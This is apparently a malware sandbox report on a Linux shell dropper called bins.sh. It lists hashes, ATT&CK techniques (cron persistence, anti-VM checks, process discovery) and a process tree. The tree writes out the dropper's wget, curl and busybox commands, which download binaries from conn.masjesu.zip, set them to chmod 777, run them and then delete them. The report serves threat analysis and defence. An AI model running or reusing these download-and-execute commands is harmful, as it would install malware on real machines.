cc389826e1c69d374e663bd661f142219337efc77291a8e24d98490ff36d9b1e

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-11-2024 08:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

535ebadfb3e0157fea5eae00397c2442
SHA1

c470a2e682c181bf7fa16097fb9fb6e13d6ec577
SHA256

cc389826e1c69d374e663bd661f142219337efc77291a8e24d98490ff36d9b1e
SHA512

2270af8ba4f42d236720f7b95d8b4f015bb15ca09511dff315d78a0912540a06411be8c7aedaeb089353581b5324c24e7b47f5b99f64659f7f360f1d28f89cbe
SSDEEP

96:YPSPqPkLmWl8txuGmUV1tyK7Lkfkzk9eGPxIxExVGWxEnMRLZxw9LhZbPjkLi6LN:g+GkFH2Q849eGv+MI+GYV849eG5

Score

7^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 7 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmod

pid process

919 chmod
925 chmod
781 chmod
875 chmod
897 chmod
903 chmod
909 chmod
Executes dropped EXE 1 IoCs

Processes:

rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

ioc pid process

/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db 782 rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
Renames itself 1 IoCs

Processes:

rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

pid process

783 rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.bhOCU5 crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curlcurl

description ioc process

File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl

pid	process
919	chmod
925	chmod
781	chmod
875	chmod
897	chmod
903	chmod
909	chmod

ioc	pid	process
/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db	782	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

pid	process
783	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.bhOCU5	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

description	ioc	process
File opened for reading	/proc/809/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/814/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/827/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/841/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/854/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/906/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/792/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/796/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/909/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/915/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/897/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/931/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/271/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/815/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/862/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/821/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/845/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/848/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/877/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/12/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/299/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/804/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/810/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/812/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/817/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/922/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/11/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/136/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/269/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/458/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/879/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/799/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/818/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/829/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/842/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/878/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/918/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/646/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/795/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/834/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/846/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/9/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/23/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/865/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/891/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/933/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/14/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/28/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/212/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/280/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/636/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/649/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/801/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/822/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/41/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/95/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/853/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/858/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/791/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/831/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/869/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/883/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/907/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
File opened for reading	/proc/8/cmdline	rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

System Network Configuration Discovery 1 TTPs 26 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

curlwgetbusyboxcurlbusyboxcurlbusyboxwgetwgetcurlbusyboxbusyboxwgetrmcurlwgetcurlwgetcurlbusyboxbusyboxwgetcurlwgetl6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcydbusybox

pid	process
895	curl
912	wget
917	busybox
923	curl
935	busybox
793	curl
874	busybox
894	wget
906	wget
913	curl
924	busybox
780	busybox
792	wget
893	rm
907	curl
922	wget
659	curl
900	wget
901	curl
902	busybox
908	busybox
929	wget
930	curl
654	wget
892	l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
896	busybox

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

curl

description ioc process

File opened for modification /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db curl

description	ioc	process
File opened for modification	/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:646
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:650
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  2⤵
  - System Network Configuration Discovery
  PID:654
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:659
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  2⤵
  - System Network Configuration Discovery
  PID:780
- /bin/chmod
  chmod 777 rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  ./rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:782
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:784
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:785
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:786
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:787
- /bin/rm
  rm rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db
  2⤵
  PID:790
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  2⤵
  - System Network Configuration Discovery
  PID:792
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  2⤵
  - System Network Configuration Discovery
  PID:793
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  2⤵
  - System Network Configuration Discovery
  PID:874
- /bin/chmod
  chmod 777 l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  ./l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  2⤵
  - System Network Configuration Discovery
  PID:892
- /bin/rm
  rm l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd
  2⤵
  - System Network Configuration Discovery
  PID:893
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  2⤵
  - System Network Configuration Discovery
  PID:895
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  2⤵
  - System Network Configuration Discovery
  PID:896
- /bin/chmod
  chmod 777 SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  2⤵
  - File and Directory Permissions Modification
  PID:897
- /tmp/SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  ./SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  2⤵
  PID:898
- /bin/rm
  rm SrxYaWRxaMj4ba8n54idi6iaf3uRfMoFpr
  2⤵
  PID:899
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  2⤵
  - System Network Configuration Discovery
  PID:900
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  2⤵
  - System Network Configuration Discovery
  PID:901
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  2⤵
  - System Network Configuration Discovery
  PID:902
- /bin/chmod
  chmod 777 IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  ./IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  2⤵
  PID:904
- /bin/rm
  rm IYpLKHG86czmzSrVMMBLpoFs1PjYKKXgcS
  2⤵
  PID:905
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  2⤵
  - System Network Configuration Discovery
  PID:906
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  PID:907
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  2⤵
  - System Network Configuration Discovery
  PID:908
- /bin/chmod
  chmod 777 J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  ./J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  2⤵
  PID:910
- /bin/rm
  rm J1QJC1kdS2esyq2WiF1GCoewowOKS7eLZN
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  2⤵
  - System Network Configuration Discovery
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  2⤵
  - System Network Configuration Discovery
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  2⤵
  - System Network Configuration Discovery
  PID:917
- /bin/chmod
  chmod 777 qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  ./qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  2⤵
  PID:920
- /bin/rm
  rm qutCDqFAHBg0Dyz9SQgR1tGJZKx5r5erCk
  2⤵
  PID:921
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  2⤵
  - System Network Configuration Discovery
  PID:922
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  2⤵
  - System Network Configuration Discovery
  PID:923
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  2⤵
  - System Network Configuration Discovery
  PID:924
- /bin/chmod
  chmod 777 h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  ./h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  2⤵
  PID:927
- /bin/rm
  rm h5uaTLSIYeVlit0NNOm6EGfbsVa3RXOviF
  2⤵
  PID:928
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QOQMSsrKf02u0mUpCzi4HlzoTGgsTjz3Zh
  2⤵
  - System Network Configuration Discovery
  PID:929
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QOQMSsrKf02u0mUpCzi4HlzoTGgsTjz3Zh
  2⤵
  - System Network Configuration Discovery
  PID:930
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QOQMSsrKf02u0mUpCzi4HlzoTGgsTjz3Zh
  2⤵
  - System Network Configuration Discovery
  PID:935

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.bhOCU5

Filesize
210B

MD5
9641edb33ff830e06471d87bc29c84e0

SHA1
ebf99644aee6e2d85110296993bb56e384325664

SHA256
b7ed4cd1657f9383cfd2e07ddd0ace5186d7fa7f3ca0bb426f552dffb0eeae43

SHA512
007126af588f7a4d8be885836c10038646abfcfc014e23d6052d178d81d39a316e07a82a4ad1fb4a557903f52dd3b85fddad0b863d5e743adad659cafa5c0821

Download Submit